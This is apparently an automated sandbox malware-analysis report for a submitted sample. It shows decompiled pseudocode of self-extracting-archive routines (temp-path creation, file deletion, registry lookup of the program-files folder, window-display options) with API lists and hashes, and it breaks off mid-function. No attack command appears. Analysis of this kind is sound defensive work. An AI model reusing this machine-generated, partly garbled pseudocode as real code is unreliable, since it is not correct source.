windowsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7DC3B(void* _a4) {
				struct tagMSG _v32;
				long _t7;
				long _t10;

				_t7 = WaitForSingleObject(_a4, 0xa);
				if(_t7 == 0x102) {
					do {
						if(PeekMessageW( &_v32, 0, 0, 0, 0) != 0) {
							GetMessageW( &_v32, 0, 0, 0);
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
						}
						_t10 = WaitForSingleObject(_a4, 0xa);
					} while (_t10 == 0x102);
					return _t10;
				}
				return _t7;
			}

0x00b7dc47
0x00b7dc54
0x00b7dc59
0x00b7dc69
0x00b7dc72
0x00b7dc7c
0x00b7dc86
0x00b7dc86
0x00b7dc91
0x00b7dc97
0x00000000
0x00b7dc9b
0x00b7dc9e

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B7DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7DC72
TranslateMessage.USER32(?), ref: 00B7DC7C
DispatchMessageW.USER32(?), ref: 00B7DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B7DC91

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 6a39c9a05e163fe54a7e5bbbdc1bc431a5a91396e320cda0c4146f397b264c60
Instruction ID: bb1cff1cad2f04a72f9aefb8cf58a4fbc5f1df1b47bbad403286ec17f3c01620
Opcode Fuzzy Hash: 6a39c9a05e163fe54a7e5bbbdc1bc431a5a91396e320cda0c4146f397b264c60
Instruction Fuzzy Hash: 0BF04F72A01219BBCB216BA5ED4DECF7FBDEF45B91B008011F50AE2050DA74C646CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B6C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B6C0C5(short* _a4, char _a12) {
				signed short* _v4;
				void* __ebp;
				intOrPtr* _t20;
				signed short* _t24;
				char _t27;
				char _t30;
				signed short* _t31;
				short _t32;
				signed int _t33;
				short _t34;
				signed short* _t37;
				char _t39;
				char _t40;
				char _t41;
				intOrPtr _t44;
				void* _t47;
				void* _t48;
				short* _t54;
				intOrPtr* _t56;
				signed short _t57;
				short* _t58;
				intOrPtr* _t59;
				signed int _t62;
				signed short* _t63;
				short _t66;
				signed short _t67;

				_t58 = _a4;
				_t20 = E00B6B92D(_t58);
				_t44 = _a4;
				_t59 = _t20;
				_t68 = _t59;
				if(_t59 != 0) {
					__eflags =  *((intOrPtr*)(_t59 + 2));
					if( *((intOrPtr*)(_t59 + 2)) == 0) {
						L7:
						__eflags = _t44 - (_t59 - _t58 >> 1);
						E00B70602(_t59, L".rar", _t44 - (_t59 - _t58 >> 1));
					} else {
						_t40 = E00B71FBB(_t59, L".exe");
						__eflags = _t40;
						if(_t40 == 0) {
							goto L7;
						} else {
							_t41 = E00B71FBB(_t59, L".sfx");
							__eflags = _t41;
							if(_t41 == 0) {
								goto L7;
							}
						}
					}
				} else {
					E00B705DA(_t68, _t58, L".rar", _t44);
					_t59 = E00B6B92D(_t58);
					if(_t59 == 0) {
						L2:
						 *_t58 = 0;
						return 0;
					}
				}
				_t24 = 0x2e;
				_v4 = _t24;
				__eflags =  *_t59 - _t24;
				if( *_t59 != _t24) {
					goto L2;
				}
				__eflags =  *((intOrPtr*)(_t59 + 2));
				if( *((intOrPtr*)(_t59 + 2)) == 0) {
					goto L2;
				}
				__eflags = _a12;
				if(__eflags != 0) {
					_t12 = _t59 + 4; // 0x4
					_t65 = _t12;
					_t27 = E00B7047A( *_t12 & 0x0000ffff);
					__eflags = _t27;
					if(_t27 == 0) {
						L30:
						return E00B70602(_t65, L"00", _t44 - (_t59 - _t58 >> 1) - 2);
					}
					_t30 = E00B7047A( *(_t59 + 6) & 0x0000ffff);
					__eflags = _t30;
					if(_t30 == 0) {
						goto L30;
					}
					_t31 = E00B83E13(_t59);
					_t47 = 0x3a;
					_t14 = _t31 - 1; // -1
					_t54 = _t59 + _t14 * 2;
					 *_t54 =  *_t54 + 1;
					__eflags =  *_t54 - _t47;
					if( *_t54 == _t47) {
						_t66 = 0x30;
						while(1) {
							__eflags = _t54 - _t58;
							if(_t54 <= _t58) {
								break;
							}
							_t33 =  *(_t54 - 2) & 0x0000ffff;
							_t62 = _t33;
							__eflags = _t33 - _v4;
							if(_t33 == _v4) {
								break;
							}
							 *_t54 = _t66;
							_t34 = _t62 + 1;
							_t54 = _t54 + 0xfffffffe;
							 *_t54 = _t34;
							__eflags = _t34 - _t47;
							if(_t34 == _t47) {
								continue;
							}
							return _t34;
						}
						_t32 = 0x61;
						 *_t54 = _t32;
						return _t32;
					}
				} else {
					_t31 = E00B6BA1E(0, __eflags, _t58);
					_t63 = _t31;
					_t48 = 0x3a;
					 *_t63 =  *_t63 + 1;
					__eflags =  *_t63 - _t48;
					if( *_t63 == _t48) {
						_t67 = 0x30;
						while(1) {
							_v4 = _t63;
							 *_t63 = _t67;
							_t63 = _t63 - 2;
							__eflags = _t63 - _t58;
							if(_t63 < _t58) {
								break;
							}
							_t39 = E00B7047A( *_t63 & 0x0000ffff);
							__eflags = _t39;
							if(_t39 == 0) {
								break;
							}
							 *_t63 =  *_t63 + 1;
							__eflags =  *_t63 - _t48;
							if( *_t63 == _t48) {
								continue;
							}
							return _t39;
						}
						_t56 = _t58 + E00B83E13(_t58) * 2;
						while(1) {
							__eflags = _t56 - _t63;
							if(_t56 == _t63) {
								break;
							}
							 *((short*)(_t56 + 2)) =  *_t56;
							_t56 = _t56 - 2;
							__eflags = _t56;
						}
						_t37 = _v4;
						_t57 = 0x31;
						 *_t37 = _t57;
						return _t37;
					}
				}
				return _t31;
			}

0x00b6c0ca
0x00b6c0cf
0x00b6c0d4
0x00b6c0d8
0x00b6c0dc
0x00b6c0de
0x00b6c105
0x00b6c109
0x00b6c129
0x00b6c131
0x00b6c13a
0x00b6c10b
0x00b6c111
0x00b6c116
0x00b6c118
0x00000000
0x00b6c11a
0x00b6c120
0x00b6c125
0x00b6c127
0x00000000
0x00000000
0x00b6c127
0x00b6c118
0x00b6c0e0
0x00b6c0e7
0x00b6c0f2
0x00b6c0f6
0x00b6c0f8
0x00b6c0fa
0x00000000
0x00b6c0fa
0x00b6c0f6
0x00b6c141
0x00b6c142
0x00b6c146
0x00b6c149
0x00000000
0x00000000
0x00b6c14b
0x00b6c14f
0x00000000
0x00000000
0x00b6c151
0x00b6c156
0x00b6c1bf
0x00b6c1bf
0x00b6c1c7
0x00b6c1cc
0x00b6c1ce
0x00b6c22f
0x00000000
0x00b6c23f
0x00b6c1d5
0x00b6c1da
0x00b6c1dc
0x00000000
0x00000000
0x00b6c1df
0x00b6c1e7
0x00b6c1e8
0x00b6c1eb
0x00b6c1ee
0x00b6c1f1
0x00b6c1f4
0x00b6c1fc
0x00b6c1fd
0x00b6c1fd
0x00b6c1ff
0x00000000
0x00000000
0x00b6c201
0x00b6c205
0x00b6c207
0x00b6c20c
0x00000000
0x00000000
0x00b6c20e
0x00b6c211
0x00b6c214
0x00b6c217
0x00b6c21a
0x00b6c21d
0x00000000
0x00000000
0x00000000
0x00b6c21d
0x00b6c226
0x00b6c227
0x00000000
0x00b6c227
0x00b6c158
0x00b6c159
0x00b6c15e
0x00b6c162
0x00b6c163
0x00b6c166
0x00b6c169
0x00b6c16d
0x00b6c16e
0x00b6c16e
0x00b6c172
0x00b6c175
0x00b6c178
0x00b6c17a
0x00000000
0x00000000
0x00b6c180
0x00b6c185
0x00b6c187
0x00000000
0x00000000
0x00b6c189
0x00b6c18c
0x00b6c18f
0x00000000
0x00000000
0x00000000
0x00b6c18f
0x00b6c19d
0x00b6c1ac
0x00b6c1ac
0x00b6c1ae
0x00000000
0x00000000
0x00b6c1a5
0x00b6c1a9
0x00b6c1a9
0x00b6c1a9
0x00b6c1b0
0x00b6c1b6
0x00b6c1b7
0x00000000
0x00b6c1b7
0x00b6c169
0x00b6c102

APIs

Part of subcall function 00B705DA: _wcslen.LIBCMT ref: 00B705E0

Part of subcall function 00B6B92D: _wcsrchr.LIBVCRUNTIME ref: 00B6B944

_wcslen.LIBCMT ref: 00B6C197
_wcslen.LIBCMT ref: 00B6C1DF

Strings

.sfx, xrefs: 00B6C11A
.exe, xrefs: 00B6C10B
.rar, xrefs: 00B6C0E1, 00B6C134

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 9b56c3e5a6593df71cb6cbf98f5b0804eee065b00c80db27c0fa00ffcb2deb85
Instruction ID: c4f918ec6f85f445e33e95312d57e184e59b0dcb68de7a7181d32612c6f0e265
Opcode Fuzzy Hash: 9b56c3e5a6593df71cb6cbf98f5b0804eee065b00c80db27c0fa00ffcb2deb85
Instruction Fuzzy Hash: FC41292254031195C731BF748852E7B7BF4EF42B44F1449CEF9EAAB191EB688D81C395

Uniqueness

Uniqueness Score: -1.00%

Function 00B7CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00B7CE87(intOrPtr __ebx, void* __ecx, void* __edx) {
				intOrPtr _t225;
				void* _t226;
				signed int _t292;
				void* _t294;
				signed int _t295;
				void* _t299;

				L0:
				while(1) {
					L0:
					if(__ebx != 1) {
						goto L123;
					}
					L107:
					__eax = __ebp - 0x788c;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
					__eax = E00B6B690(__eflags, __ebp - 0x788c, 0x800);
					__ebx = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L109:
						_push( *0xb9e724);
						__ebp - 0x788c = E00B64092(0xba946a, __edi, L"%s%s%u", __ebp - 0x788c);
						__eax = E00B6A231(0xba946a);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L108:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L110:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xba946a);
					__eflags =  *(__ebp - 0x588c) - __bx;
					if( *(__ebp - 0x588c) == __bx) {
						while(1) {
							L175:
							_push(0x1000);
							_t213 = _t299 - 0x15; // 0xffffa75f
							_t214 = _t299 - 0xd; // 0xffffa767
							_t215 = _t299 - 0x588c; // 0xffff4ee8
							_t216 = _t299 - 0xf894; // 0xfffeaee0
							_push( *((intOrPtr*)(_t299 + 0xc)));
							_t225 = E00B7B314(0x800, _t299);
							_t277 =  *((intOrPtr*)(_t299 + 0x10));
							 *((intOrPtr*)(_t299 + 0xc)) = _t225;
							if(_t225 != 0) {
								_t226 = _t299 - 0x588c;
								_t294 = _t299 - 0x1b894;
								_t292 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E00B71FBB(_t299 - 0xf894,  *((intOrPtr*)(0xb9e744 + _t295 * 4))) != 0) {
								_t295 = _t295 + 1;
								if(_t295 < 0xe) {
									continue;
								} else {
									goto L175;
								}
							}
							__eflags = _t295 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t295 * 4 +  &M00B7D41B))) {
								case 0:
									L9:
									__eflags = _t277 - 2;
									if(_t277 == 2) {
										E00B7A64D(_t299 - 0x788c, 0x800);
										E00B6A544(E00B6BDF3(__eflags, _t299 - 0x788c, _t299 - 0x588c, _t299 - 0xd894, 0x800), _t277, _t299 - 0x8894, _t295);
										 *(_t299 - 4) = 0;
										E00B6A67E(_t299 - 0x8894, _t299 - 0xd894);
										E00B66EDB(_t299 - 0x388c);
										while(1) {
											L23:
											_push(0);
											_t240 = E00B6A5D1(_t299 - 0x8894, _t299 - 0x388c);
											__eflags = _t240;
											if(_t240 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t299 - 0x388c, 0);
											__eflags =  *(_t299 - 0x2880);
											if(__eflags == 0) {
												L16:
												_t244 = GetFileAttributesW(_t299 - 0x388c);
												__eflags = _t244 - 0xffffffff;
												if(_t244 == 0xffffffff) {
													continue;
												}
												L17:
												_t246 = DeleteFileW(_t299 - 0x388c);
												__eflags = _t246;
												if(_t246 != 0) {
													continue;
												} else {
													_t297 = 0;
													_push(0);
													goto L20;
													L20:
													E00B64092(_t299 - 0x1044, 0x800, L"%s.%d.tmp", _t299 - 0x388c);
													_t301 = _t301 + 0x14;
													_t251 = GetFileAttributesW(_t299 - 0x1044);
													__eflags = _t251 - 0xffffffff;
													if(_t251 != 0xffffffff) {
														_t297 = _t297 + 1;
														__eflags = _t297;
														_push(_t297);
														goto L20;
													} else {
														_t254 = MoveFileW(_t299 - 0x388c, _t299 - 0x1044);
														__eflags = _t254;
														if(_t254 != 0) {
															MoveFileExW(_t299 - 0x1044, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E00B6B991(__eflags, _t299 - 0x788c, _t299 - 0x1044, 0x800);
											E00B6B690(__eflags, _t299 - 0x1044, 0x800);
											_t298 = E00B83E13(_t299 - 0x788c);
											__eflags = _t298 - 4;
											if(_t298 < 4) {
												L14:
												_t265 = E00B6BDB4(_t299 - 0x588c);
												__eflags = _t265;
												if(_t265 != 0) {
													break;
												}
												L15:
												_t268 = E00B83E13(_t299 - 0x388c);
												__eflags = 0;
												 *((short*)(_t299 + _t268 * 2 - 0x388a)) = 0;
												E00B7FFF0(0x800, _t299 - 0x44, 0, 0x1e);
												_t301 = _t301 + 0x10;
												 *((intOrPtr*)(_t299 - 0x40)) = 3;
												_push(0x14);
												_pop(_t271);
												 *((short*)(_t299 - 0x34)) = _t271;
												 *((intOrPtr*)(_t299 - 0x3c)) = _t299 - 0x388c;
												_push(_t299 - 0x44);
												 *0xbc307c();
												goto L16;
											}
											L13:
											_t276 = E00B83E13(_t299 - 0x1044);
											__eflags = _t298 - _t276;
											if(_t298 > _t276) {
												goto L15;
											}
											goto L14;
										}
										L24:
										 *(_t299 - 4) =  *(_t299 - 4) | 0xffffffff;
										E00B6A55A(_t299 - 0x8894);
									}
									goto L175;
								case 1:
									L25:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L175;
									} else {
										__eax =  *0xbbfc94;
										__eflags = __eax;
										__ebx = __ebx & 0xffffff00 | __eax == 0x00000000;
										__eflags = __eax;
										if(__eax != 0) {
											__eax =  *0xbbfc94;
											_pop(__ecx);
											_pop(__ecx);
										}
										__bh =  *((intOrPtr*)(__ebp - 0xd));
										__eflags = __bh;
										if(__eflags == 0) {
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__esi = E00B7B48E(__ecx, __edx, __eflags);
											__eax =  *0xbbfc94;
										} else {
											__esi = __ebp - 0x588c;
										}
										__eflags = __bl;
										if(__bl == 0) {
											__edi = __eax;
										}
										L33:
										__eax = E00B83E13(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0xbbfc94);
										__eax = E00B83E3E(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax == 0) {
											L37:
											__eflags = __bh;
											if(__bh == 0) {
												__eax = L00B83E2E(__esi);
											}
											goto L175;
										}
										L34:
										 *0xbbfc94 = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										L36:
										__eax = E00B87686(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
										goto L37;
									}
								case 2:
									L39:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
									}
									goto L175;
								case 3:
									L41:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L175;
									}
									L42:
									__eflags =  *0xbaa472 - __di;
									if( *0xbaa472 != __di) {
										goto L175;
									}
									L43:
									__eax = 0;
									__edi = __ebp - 0x588c;
									_push(0x22);
									 *(__ebp - 0x1044) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x588c) - __ax;
									if( *(__ebp - 0x588c) == __ax) {
										__edi = __ebp - 0x588a;
									}
									__eax = E00B83E13(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L175;
									} else {
										L46:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L50:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L62:
												__ebp - 0x1044 = E00B70602(__ebp - 0x1044, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L63:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x1044;
												__eax = E00B8279B(__ebp - 0x1044, __ebp - 0x1044);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *(__eax + 2) - __bx;
													if( *(__eax + 2) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x1044;
												__edi = 0xbaa472;
												E00B70602(0xbaa472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
												__eax = E00B7B1BE(__ebp - 0x1044, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
												__eax = SendMessageW(__esi, 0x143, __ebx, 0xbaa472); // executed
												__eax = __ebp - 0x1044;
												__eax = E00B83E49(__ebp - 0x1044, 0xbaa472, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
												}
												goto L175;
											}
											L51:
											__eflags = __ax;
											if(__ax == 0) {
												L53:
												__eax = __ebp - 0x1c;
												__ebx = 0;
												_push(__ebp - 0x1c);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0xbc3028();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x1044;
													_push(__ebp - 0x1044);
													__eax = __ebp - 0x24;
													_push(__ebp - 0x24);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x1c));
													__eax =  *0xbc3024();
													_push( *(__ebp - 0x1c));
													 *0xbc3008() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *(__ebp + __eax * 2 - 0x1044) = __cx;
												}
												__eflags =  *(__ebp - 0x1044) - __bx;
												if( *(__ebp - 0x1044) != __bx) {
													__eax = __ebp - 0x1044;
													__eax = E00B83E13(__ebp - 0x1044);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x1044 = E00B705DA(__eflags, __ebp - 0x1044, "\\", __esi);
													}
												}
												__esi = E00B83E13(__edi);
												__eax = __ebp - 0x1044;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x1044 = E00B705DA(__eflags, __ebp - 0x1044, __edi, 0x800);
												}
												goto L63;
											}
											L52:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L62;
											}
											goto L53;
										}
										L47:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L51;
										}
										L48:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L175;
										}
										L49:
										__ebp - 0x1044 = E00B70602(__ebp - 0x1044, __edi, 0x800);
										goto L63;
									}
								case 4:
									L68:
									__eflags =  *0xbaa46c - 1;
									__eflags = __eax - 0xbaa46c;
									 *__edi =  *__edi + __ecx;
									__eflags =  *(__edx + 7) & __al;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L73:
									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0xba8457 = __cl;
										 *0xba8460 = 1;
										goto L175;
									}
									L74:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L78:
										 *0xba8457 = __cl;
										L79:
										 *0xba8460 = __cl;
										goto L175;
									}
									L75:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L80;
									}
									L76:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L175;
									}
									L77:
									 *0xba8457 = 1;
									goto L79;
								case 6:
									L86:
									__edi = 0;
									 *0xbac577 = 1;
									__edi = 1;
									__eax = __ebp - 0x588c;
									__eflags =  *(__ebp - 0x588c) - 0x3c;
									__ebx = __esi;
									 *(__ebp - 0x14) = __eax;
									if( *(__ebp - 0x588c) != 0x3c) {
										L97:
										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
										if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
											L100:
											__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
											if( *((intOrPtr*)(__ebp + 0x10)) != 4) {
												goto L175;
											}
											L101:
											__eflags = __ebx - 6;
											if(__ebx != 6) {
												goto L175;
											}
											L102:
											__ecx = 0;
											__eflags = 0;
											_push(0);
											L103:
											_push(__edi);
											_push(__eax);
											_push( *(__ebp + 8));
											__eax = E00B7D78F(__ebp);
											goto L175;
										}
										L98:
										__eflags = __ebx - 9;
										if(__ebx != 9) {
											goto L175;
										}
										L99:
										_push(1);
										goto L103;
									}
									L87:
									__eax = __ebp - 0x588a;
									_push(0x3e);
									_push(__ebp - 0x588a);
									__eax = E00B822C6(__ecx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										L96:
										__eax =  *(__ebp - 0x14);
										goto L97;
									}
									L88:
									_t103 = __eax + 2; // 0x2
									__ecx = _t103;
									 *(__ebp - 0x14) = _t103;
									__ecx = 0;
									 *__eax = __cx;
									__eax = __ebp - 0x10c;
									_push(0x64);
									_push(__ebp - 0x10c);
									__eax = __ebp - 0x588a;
									_push(__ebp - 0x588a);
									__eax = E00B7AF98();
									 *(__ebp - 0x20) = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										goto L96;
									}
									L89:
									__esi = __eax;
									while(1) {
										L90:
										__eflags =  *(__ebp - 0x10c);
										if( *(__ebp - 0x10c) == 0) {
											goto L96;
										}
										L91:
										__eax = __ebp - 0x10c;
										__eax = E00B71FBB(__ebp - 0x10c, L"HIDE");
										__eax =  ~__eax;
										asm("sbb eax, eax");
										__edi = __edi & __eax;
										__eax = __ebp - 0x10c;
										__eax = E00B71FBB(__ebp - 0x10c, L"MAX");
										__eflags = __eax;
										if(__eax == 0) {
											_push(3);
											_pop(__edi);
										}
										__eax = __ebp - 0x10c;
										__eax = E00B71FBB(__ebp - 0x10c, L"MIN");
										__eflags = __eax;
										if(__eax == 0) {
											_push(6);
											_pop(__edi);
										}
										_push(0x64);
										__eax = __ebp - 0x10c;
										_push(__ebp - 0x10c);
										_push(__esi);
										__esi = E00B7AF98();
										__eflags = __esi;
										if(__esi != 0) {
											continue;
										} else {
											goto L96;
										}
									}
									goto L96;
								case 7:
									goto L0;
								case 8:
									L127:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x588c) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x588c;
											_push(__ebp - 0x588c);
											__eax = E00B87625(__ebx, __edi);
											_pop(__ecx);
											 *0xbbfc9c = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0xbbfc98 = E00B7B48E(__ecx, __edx, __eflags);
									}
									 *0xbac576 = 1;
									goto L175;
								case 9:
									L132:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L175;
									}
									L133:
									__eax = 0;
									 *(__ebp - 0x2844) = __ax;
									__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
									__eax = E00B879E9( *(__ebp - 0x1b894) & 0x0000ffff);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										 *(__ebp - 0x14) = 2;
										__eax = 0xbbcb82;
									} else {
										__eflags = __eax - 0x54;
										if(__eax == 0x54) {
											 *(__ebp - 0x14) = 7;
											__eax = 0xbbbb82;
										} else {
											 *(__ebp - 0x14) = 0x10;
											__eax = 0xbbdb82;
										}
									}
									__esi = 0x800;
									__ebp - 0x2844 = E00B70602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
									__eax = 0;
									 *(__ebp - 0x9894) = __ax;
									 *(__ebp - 0x1844) = __ax;
									__ebp - 0x19894 = __ebp - 0x688c;
									__eax = E00B70602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x688c) - __bx;
									if( *(__ebp - 0x688c) != __bx) {
										L141:
										__ebp - 0x688c = E00B6A231(__ebp - 0x688c);
										__eflags = __al;
										if(__al != 0) {
											goto L160;
										}
										L142:
										__ax =  *(__ebp - 0x688c);
										__esi = __ebp - 0x688c;
										__ebx = __edi;
										__eflags = __ax;
										if(__ax == 0) {
											L159:
											__esi = 0x800;
											goto L160;
										}
										L143:
										__edi = __ax & 0x0000ffff;
										do {
											L144:
											_push(0x20);
											_pop(__eax);
											__eflags = __di - __ax;
											if(__di == __ax) {
												L146:
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x688c = E00B6A231(__ebp - 0x688c);
												__eflags = __al;
												if(__al == 0) {
													L155:
													__esi->i = __di;
													goto L156;
												}
												L147:
												__ebp - 0x688c = E00B6A243(__ebp - 0x688c);
												__eax = E00B6A28F(__eax);
												__eflags = __al;
												if(__al != 0) {
													goto L155;
												}
												L148:
												_push(0x2f);
												_pop(__ecx);
												__eax =  &(__esi->i);
												__ebx = __esi;
												__eflags = __di - __cx;
												if(__di != __cx) {
													L150:
													_push(0x20);
													__esi = __eax;
													_pop(__eax);
													while(1) {
														L152:
														__eflags = __esi->i - __ax;
														if(__esi->i != __ax) {
															break;
														}
														L151:
														__esi =  &(__esi->i);
														__eflags = __esi;
													}
													L153:
													__ecx = __ebp - 0x1844;
													__eax = __esi;
													__edx = 0x400;
													L154:
													__eax = E00B70602(__ecx, __eax, __edx);
													 *__ebx = __di;
													goto L156;
												}
												L149:
												 *(__ebp - 0x1844) = __cx;
												__edx = 0x3ff;
												__ecx = __ebp - 0x1842;
												goto L154;
											}
											L145:
											_push(0x2f);
											_pop(__eax);
											__eflags = __di - __ax;
											if(__di != __ax) {
												goto L156;
											}
											goto L146;
											L156:
											__esi =  &(__esi->i);
											__eax = __esi->i & 0x0000ffff;
											__edi = __esi->i & 0x0000ffff;
											__eflags = __ax;
										} while (__ax != 0);
										__esi = 0x800;
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											 *__ebx = __ax;
										}
										goto L160;
									} else {
										L139:
										__ebp - 0x19892 = __ebp - 0x688c;
										E00B70602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
										_push(__ebx);
										_push(__ebp - 0x688a);
										__eax = E00B822C6(__ecx);
										_pop(__ecx);
										_pop(__ecx);
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x1844 = E00B70602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
										}
										L160:
										__eflags =  *((short*)(__ebp - 0x11894));
										if( *((short*)(__ebp - 0x11894)) != 0) {
											__ebp - 0x9894 = __ebp - 0x11894;
